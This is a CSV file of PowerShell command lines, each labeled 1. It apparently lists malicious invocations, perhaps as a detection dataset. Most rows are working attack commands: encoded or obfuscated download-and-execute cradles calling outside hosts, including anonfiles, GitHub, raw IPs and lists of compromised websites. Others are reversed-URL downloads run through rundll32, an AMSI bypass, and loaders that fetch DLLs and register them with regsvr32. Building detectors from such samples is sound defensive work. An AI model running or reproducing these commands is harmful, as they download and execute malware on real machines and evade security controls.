"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-eNcoDEdCommAnd YwBlAHIAdAB1AHIAaQBsAC4AZQB4AGUAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAC0AZgAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgACUAVABlAG0AcAAlAFwAYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUAXABhAC4AZQB4AGUAIAAmACYAIABjAGUAcgB0AHUAcgBpAGwALgBlAHgAZQAgAC0AdQByAGwAYwBhAGMAaABlACAALQBmACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAlAFQAZQBtAHAAJQBcAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAFwAYQAuAHAAZABmAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ARQBWAEkATAAvAFMAQwBSAEkAUABUAC4AcABzADEAIgApAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-encodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB0AC4AbAB5AC8AdwAtAHIAdwAgAC0ATwB1AHQARgBpAGwAZQAgACUAVABlAG0AcAAlAFwAYQAuAGUAeABlACAAJgAmACAAcwB0AGEAcgB0ACAAJQBUAGUAbQBwACUAXABhAC4AZQB4AGUAIAAmACYAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAHQALgBsAHkALwB1AEoAdwBJADcAIAAtAE8AdQB0AEYAaQBsAGUAIAAlAFQAZQBtAHAAJQBcAGEALgBwAGQAZgAgACYAJgAgAHMAdABhAHIAdAAgACUAVABlAG0AcAAlAFwAYQAuAHAAZABmAA==""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.Webclient).downloadstring(""http://EVIL/SCRIPT.ps1"")""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""Start-Process -NoNewWindow powershell ""-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""iex (New-Object Net.WebClient).DownloadString('https://cdn-117.anonfiles.com/E5GeQa0dy7/833623ca-1658923370/script.ps1')""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""mshta.exe ""C:\ads\file.txt:file.hta""""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $OERShlEm = [convert]::FromBase64String('CgYb');$ELmrBbSY = [convert]::FromBase64String('LjArNyJjKzc3MzB5bGwkLCksNjEtJjowbSAsLmwwJjE1KiAmbSs3Ig==');$SVdfuRqV = -join($OERShlEm | % {[char] ($_ -bxor 0x43)});$bHnzQGNa = -join ($ELmrBbSY | % { [char] ($_ -bxor 0x43)});sal psjSnWRO $SVdfuRqV;psjSnWRO $bHnzQGNa","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $OqkfuKMb = [convert]::FromBase64String('enZr');$WNvWLeRZ = [convert]::FromBase64String('XkBbR1ITW0dHQwkcHAIEBR0CAwMdBwEdAgsDHFxGRx1bR1I=');$gWjyTUNH = -join($OqkfuKMb | % {[char] ($_ -bxor 0x33)});$YovNwmbQ = -join ($WNvWLeRZ | % { [char] ($_ -bxor 0x33)});sal OjMNLNhB $gWjyTUNH;OjMNLNhB $YovNwmbQ","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $cAaiTziQ = [convert]::FromBase64String('LyM+');$SsNsaxaj = [convert]::FromBase64String('CxUOEgdGDhISFhVcSUkSFAcIFQADFEgVDkkBAxJJNhM3ICQgSRYKBx9IDhIH');$KsgzoFPL = -join($cAaiTziQ | % {[char] ($_ -bxor 0x66)});$eKALvENl = -join ($SsNsaxaj | % { [char] ($_ -bxor 0x66)});sal KwYdOxYp $KsgzoFPL;KwYdOxYp $eKALvENl","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $kQdWtjfn = [convert]::FromBase64String('enZr');$XjZkDmxa = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAYFHVtHUg==');$jQzrmDAh = -join($kQdWtjfn | % {[char] ($_ -bxor 0x33)});$excgaoEO = -join ($XjZkDmxa | % { [char] ($_ -bxor 0x33)});sal BjqywBOs $jQzrmDAh;BjqywBOs $excgaoEO","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $mJuwWJPv = [convert]::FromBase64String('PjIv');$BLXdFcys = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYRkUfWR8DFg==');$JOwzxWLM = -join($mJuwWJPv | % {[char] ($_ -bxor 0x77)});$CXCutxtc = -join ($BLXdFcys | % { [char] ($_ -bxor 0x77)});sal ZXuOiNqJ $JOwzxWLM;ZXuOiNqJ $CXCutxtc","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $path=($pwd).path; powershell -ExecutionPolicy Bypass -File $path'\script.ps1';","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $s='/32549294398iytjtou/evres/dx/tseuq.tensenssibsessabsenork//:ptth'; $r=$s[-1..-($s.Length)] -join ''; iwr -uri $r -o ""c:\users\public\default.png"";ru""ndll""32 c:\users\public\default.png,`#1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $s='/354353954kkdk/evres/dx/tseuq.tensenssibsuoyrof//:ptth'; $r=$s[-1..-($s.Length)] -join ''; iwr -uri $r -o ""c:\users\public\default.png"";ru""ndll""32 c:\users\public\default.png,`#1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $s='/4y4d3td3tdhk/evres/dx/us.okcenakmalp//:ptth'; $r=$s[-1..-($s.Length)] -join ''; iwr -uri $r -o ""c:\users\public\default.png"";ru""ndll""32 c:\users\public\default.png,`#1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $s='/g54y5gcm548757vy/evres/dx/us.ssseniram//:ptth'; $r=$s[-1..-($s.Length)] -join ''; iwr -uri $r -o ""c:\users\public\default.png"";ru""ndll""32 c:\users\public\default.png,`#1","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" $xrrCQEUf = [convert]::FromBase64String('PjIv');$rvIxkgme = [convert]::FromBase64String('GgQfAxZXHwMDBwRNWFgAFhkQWhMWAxZaBBQeEhkUElkUGBpYAAdaFBgZAxIZA1gDHxIaEgRYBBQWBxIEHxgDWBIDEgQDWR8DFg==');$BJtiaLic = -join($xrrCQEUf | % {[char] ($_ -bxor 0x77)});$uVgPreUS = -join ($rvIxkgme | % { [char] ($_ -bxor 0x77)});sal ABJmyxbD $BJtiaLic;ABJmyxbD $uVgPreUS","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" (((""{17}{5}{8}{27}{18}{11}{4}{23}{22}{25}{24}{9}{1}{21}{13}{6}{15}{0}{16}{12}{28}{14}{20}{19}{2}{7}{26}{10}{3}""-f'dy7/833623ca','le','.',')','trin',' (New-Object Net.','Qa','p','WebC','nonfi','}','oadS','9233','5Ge','/sc','0','-1658','iex','wnl','t','rip','s.com/E','0}https://cdn-1','g({','7.a','1','s1{0','lient).Do','70')) -f[cHar]39) |. ( $psHOme[21]+$pSHomE[30]+'X')","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" (((""{3}{4}{6}{2}{9}{8}{0}{7}{1}{5}""-f '.','2','5','(','QPN','b','pwd).path+c2b','ps1c','pt','HFscri')) -replACe([cHaR]99+[cHaR]50+[cHaR]98),[cHaR]34-replACe 'QPN',[cHaR]36-replACe'5HF',[cHaR]92) |. ( ([StRiNg]$verboSEPrEfeReNce)[1,3]+'x'-JOIN'')","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -""""nop ""$Q='IEX(New-Object Net.WebClient).Downlo';$W='X(''ht''+''tp:/''+''/106.''+''55.''+''231.88:4545/enterFor.vbs'',''C:\temp\enterFor.vbs'')'.Replace('X','adFile');IEX($Q+$W)"";C:\temp\enterFor.vbs","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -""""nop ""$Q='IEX(New-Object Net.WebClient).Downlo';$W='X('ht'+'tp:/'+'/106.'+'55.'+'231.88:4545/enterFor.vbs','C:\temp\enterFor.vbs')'.Replace('X','adFile');IEX($Q+$W)""&&wscript.exe C:\temp\enterFor.vbs","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File calc.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File https://192.168.1.15:80/1.exe","C:\Windows\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($env:USERPROFILE+'\x.exe')).EntryPoint.Invoke($Null,$Null)","C:\Windows\system32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c SafetyTest.pdf","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c assignent scan.doc","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c bruh.xml","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoLogo -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -File ""C:\ProgramData\Scappman\Google\Google Chrome\GoogleChromeUninstall.ps1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoP -NonI -Exec Bypass -W Hidden -ExecutionPolicy bypass -noprofile -EncodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABp
AGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBmAGEA
cwB0AHgAcwB0AHIAZQBhAG0AegAuAGgAZQByAG8AawB1AGEAcABwAC4AYwBvAG0ALwA5ADEAMwA5
ADEANQAvAG4AZABwADQANgAyAC0AawBiADMAMQA1ADEAOAAwADAALQB4ADgANgAtAHgANgA0AC0A
YQBsAGwAbwBzAC0AcgB1AHMALgBzAGMAcgA/AGgAYQBzAGgAPQBBAGcAQQBEAHoAaAAnACwAJwBu
AGQAcAA0ADYAMgAtAGsAYgAzADEANQAxADgAMAAwAC0AeAA4ADYALQB4ADYANAAtAGEAbABsAG8A
cwAtAHIAdQBzAC4AcwBjAHIAIAAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAn
AG4AZABwADQANgAyAC0AawBiADMAMQA1ADEAOAAwADAALQB4ADgANgAtAHgANgA0AC0AYQBsAGwA
bwBzAC0AcgB1AHMALgBzAGMAcgAnAA==","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoP -NonI -Window Hidden -ExecutionPolicy Bypass -Command "".\Sysmon64.exe""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]","C:\WINDOWS\System32\WindowsPowerShell\v1.0\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -STA -WindowStyle Hidden -ExecutionPolicy Bypass -NoExit -command ""& '.\Get-CallMetrics.ps1'""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Win hidden -nonI -noP -Exe ByPass -Command ""iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/WirapongP/temp/main/tcp.ps1')""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -WindowStyle Hidden -ExecutionPolicy Bypass -File ""C:\rs232-bvs-e-id\form.ps1""","C:\Users\user\Desktop\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -WindowStyle hidden Invoke-WebRequest -Uri ""http://www.costco.com"" -OutFile ""file"";.\file","C:\Users\user\AppData\Local\Temp\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'+6eAlMvm8fcT6lHDHqleMOJkIj5ptqYTodBZe71ItTIHkGZcUfdSlskHWDcN/+qcQpZkl3YG';$RIr='ICAgICAgIFdyaXRlLUhvc3QgIm9qeEZVIjskUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vbW92ZWlzcGxhbmVqYWRvcy5hcnQuYnIvd3A';$wRseQ='tYWRtaW4vRUJ4YlU3TWxJaE9NLyIsImh0dHA6Ly9zaWV1dGhpcGh1dHVuZ3hlbmFuZy5jb20vb2xkX3NvdXJjZS9HMWV4SFgwcll5di8iLCJodHRwczovL2tpbmdtb2RlLmlyL3dwLWFkbWluL1JsSS8iLCJodHRwczovL2tpbmdrb25ncGl6emEucnUvZm9udHMvNS8iLCJodHRwczovL21ld29sdGVycy5ubC90bXAvU3JKdS8iLCJodHRwczovL3d3dy5vbGFmcy1yYWRsYWRlbi5kZS9jYXB0Y2hhL3lDeEYyLyIpOyR0PSJRWlFIWW15IjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXFdsR1ZnSmdMRnMuUnZCO1JlZ3N2cjMyLmV4ZSAiJGRcV2xHVmdKZ0xGcy5SdkIiO2JyZWFrfSBjYXRjaCB7IH19';$dQnUE=$RIr+$wRseQ;$THsRjX=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($dQnUE));$dQnUE=$THsRjX;iex($dQnUE)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'+g3WXaIlLg3m8gnwKp0i9lX40ar7d+cvwhpItKeNpm7UYfuwECJHI0D8YkoAet4Iz/2CHq9G';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'+lt3naFTq7cRWbqswBI0PscuEFIFZbCPbdAZ5zI7znlCFby2uttnzGwykwiRLKL1itrXh/8g';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'+wQpSYzH6gBfQeL+otNlA9XN9w3mNes/qB7+YhCBePQfjCtS3uAnU4l8Wzh42S9PttjNi8a+';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'/2X4vFWYTtiwuYFX5uMoS91q/UjOmTW0h+vgHnyeHxsSWCDirNH3MdMOrxHaLrVeb4D0KQXc';$MjIdco='ICAgV3JpdGUtSG9zdCAiVlNFU1oiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHBzOi8vd3d3LnllbGwuZ2UvbmF2X2xvZ28vQUVuVFAvIiwiaHR0cDovL3l1c3V';$mncv='ma2FycGFrLmNvbS50ci9jc3MvN3lDSjZLcEdOZE93blcvIiwiaHR0cHM6Ly95YWtvc3VyZi5jb20vd3AtaW5jbHVkZXMvUy8iLCJodHRwczovL3lveW1hbmFqZW1lbi5pZC93cC1hZG1pbi94OUVqdTAvIiwiaHR0cHM6Ly95ZWRpcmVua2FqYW5zLmNvbS9lc2tpL0V2ZW9GcWs4SGx1dlMvIiwiaHR0cDovL3l1ZGFpc3V6dWtpLmpwLzE1MDkxMXByZS9pSS8iKTskdD0idWpYZ0FEIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXHJSWHF3R3ZHTlIud1RqO1JlZ3N2cjMyLmV4ZSAiJGRcclJYcXdHdkdOUi53VGoiO2JyZWFrfSBjYXRjaCB7IH19';$oTNOK=$MjIdco+$mncv;$cdOyg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($oTNOK));$oTNOK=$cdOyg;iex($oTNOK)}""","c:\",1
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&{'0bB1SRCTPB/q7LaUmE8nV9fQq5+qbDyUliBfDKWqXugGeU0qbYeaJnYCcWQVg3XliL8JkKes';$HRfF='ICAgICBXcml0ZS1Ib3N0ICJXTHJWUCI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly93d3cuaW5ncm91cGNvbnN1bHQuY29tL2ltYWdlcy9QRXgvIiwiaHR0cDovL3d1bGYubmwvY2dpLWJpbi9';$RFnG='0LyIsImh0dHA6Ly93cC5lcnlhei5uZXQvYmF5YXIxLzlaQUFPLyIsImh0dHA6Ly93d3cuY2lzbmMuaXQvd3AtY29udGVudC9TZ0NicklSeVV3YjlrakVLZTNKLyIsImh0dHA6Ly9hbGRvanVhbnBldHRpdGkuY29tLmFyL2FsbWFodS5jb20uYXIvQURPWXMvIiwiaHR0cDovL3poaXZpci5jb20vd3AvVS8iKTskdD0iVFFRd25jVGRLIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXEVKanVUcHdpWUEuUEhCO1JlZ3N2cjMyLmV4ZSAiJGRcRUpqdVRwd2lZQS5QSEIiO2JyZWFrfSBjYXRjaCB7IH19';$ryVIql=$HRfF+$RFnG;$zDDWaH=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($ryVIql));$ryVIql=$zDDWaH;iex($ryVIql)}""","c:\",1
